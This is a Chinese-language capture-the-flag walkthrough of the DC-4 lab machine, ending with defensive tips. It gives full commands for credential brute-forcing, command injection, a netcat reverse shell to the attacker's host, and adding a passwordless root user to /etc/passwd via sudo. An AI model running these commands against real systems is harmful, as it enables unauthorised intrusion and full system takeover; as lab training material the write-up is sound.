Vulhub 练习 DC-4靶机完整复现
字数 1035 2025-08-18 11:35:59

Vulhub DC-4靶机渗透测试完整复现教程

一、环境准备

1. 工具与设备

  • Kali Linux攻击机:IP地址192.168.200.4
  • DC-4靶机:IP地址未知(需通过扫描发现)
  • 网络配置:两台机器必须使用相同的网络连接方式(本教程使用NAT模式)

二、信息收集阶段

1. 主机发现

使用以下两种方法发现靶机IP:

# 方法一:ARP扫描
arp-scan -l

# 方法二:Nmap Ping扫描
nmap -sP 192.168.200.0/24 -T4

2. 端口扫描

发现靶机IP后(假设为192.168.200.9),进行详细端口扫描:

nmap -sV -p- 192.168.200.9

3. Web应用探测

  • 使用浏览器访问靶机Web服务
  • 使用whatweb进行指纹识别:
whatweb http://192.168.200.9

三、Web应用渗透

1. 密码爆破

  • 发现登录页面需要admin凭证
  • 使用暴力破解获得密码:happy

2. 命令注入漏洞

  • 登录后发现可执行命令的功能
  • 使用Burp Suite拦截请求,发现执行的是ls命令
  • 尝试注入其他命令:
    • whoami
    • ip addr

四、获取初始立足点

1. 反弹Shell

  1. 在Kali上启动监听:

    nc -lvvp 8899
    
  2. 通过命令注入执行反弹Shell:

    nc 192.168.200.3 8899 -e /bin/bash
    
  3. 获取低权限Shell后,升级为交互式Shell:

    python -c 'import pty;pty.spawn("/bin/bash")'
    

2. 横向移动

  • /home目录发现三个用户:charles、jim、sam
  • 在jim目录下发现old-passowrd.bak文件
  • 使用hydra爆破jim的SSH密码:
    hydra -l jim -P /home/kali/123.txt ssh://192.168.200.9
    
    获得凭证:jim/jibril04

3. 获取charles凭证

  • 检查/var/mail目录
  • 发现charles的邮件,包含密码:^xHhA&hvim0y
  • 切换用户:
    su charles
    

五、权限提升

1. 检查sudo权限

sudo -l

发现可以使用teehee命令且不需要密码

2. 利用teehee提权

  1. 添加root权限用户:

    echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
    
    • 用户名:admin
    • UID/GID设置为0(root权限)
    • 无密码
  2. 切换到admin用户:

    su admin
    

六、关键点总结

  1. 信息收集:ARP和Nmap扫描是发现目标的基础

  2. Web渗透:密码爆破和命令注入是突破口

  3. 权限提升路径

    • Web命令注入→低权限Shell
    • 密码爆破→jim用户
    • 邮件信息→charles用户
    • Sudo滥用→root权限
  4. 提权技巧

    • 利用可写/etc/passwd的特性添加root用户
    • 注意teehee命令的-a参数等同于>>重定向

七、防御建议

  1. 加强密码策略,避免使用弱密码
  2. 限制sudo权限,避免无密码执行危险命令
  3. 对用户输入进行严格过滤,防止命令注入
  4. 定期检查/var/mail等敏感目录
  5. 监控/etc/passwd文件的异常修改
Vulhub DC-4靶机渗透测试完整复现教程 一、环境准备 1. 工具与设备 Kali Linux攻击机 :IP地址192.168.200.4 DC-4靶机 :IP地址未知(需通过扫描发现) 网络配置 :两台机器必须使用相同的网络连接方式(本教程使用NAT模式) 二、信息收集阶段 1. 主机发现 使用以下两种方法发现靶机IP: 2. 端口扫描 发现靶机IP后(假设为192.168.200.9),进行详细端口扫描: 3. Web应用探测 使用浏览器访问靶机Web服务 使用whatweb进行指纹识别: 三、Web应用渗透 1. 密码爆破 发现登录页面需要admin凭证 使用暴力破解获得密码: happy 2. 命令注入漏洞 登录后发现可执行命令的功能 使用Burp Suite拦截请求,发现执行的是 ls 命令 尝试注入其他命令: whoami ip addr 四、获取初始立足点 1. 反弹Shell 在Kali上启动监听: 通过命令注入执行反弹Shell: 获取低权限Shell后,升级为交互式Shell: 2. 横向移动 在 /home 目录发现三个用户:charles、jim、sam 在jim目录下发现 old-passowrd.bak 文件 使用hydra爆破jim的SSH密码: 获得凭证:jim/jibril04 3. 获取charles凭证 检查 /var/mail 目录 发现charles的邮件,包含密码: ^xHhA&hvim0y 切换用户: 五、权限提升 1. 检查sudo权限 发现可以使用 teehee 命令且不需要密码 2. 利用teehee提权 添加root权限用户: 用户名:admin UID/GID设置为0(root权限) 无密码 切换到admin用户: 六、关键点总结 信息收集 :ARP和Nmap扫描是发现目标的基础 Web渗透 :密码爆破和命令注入是突破口 权限提升路径 : Web命令注入→低权限Shell 密码爆破→jim用户 邮件信息→charles用户 Sudo滥用→root权限 提权技巧 : 利用可写/etc/passwd的特性添加root用户 注意 teehee 命令的-a参数等同于 >> 重定向 七、防御建议 加强密码策略,避免使用弱密码 限制sudo权限,避免无密码执行危险命令 对用户输入进行严格过滤,防止命令注入 定期检查/var/mail等敏感目录 监控/etc/passwd文件的异常修改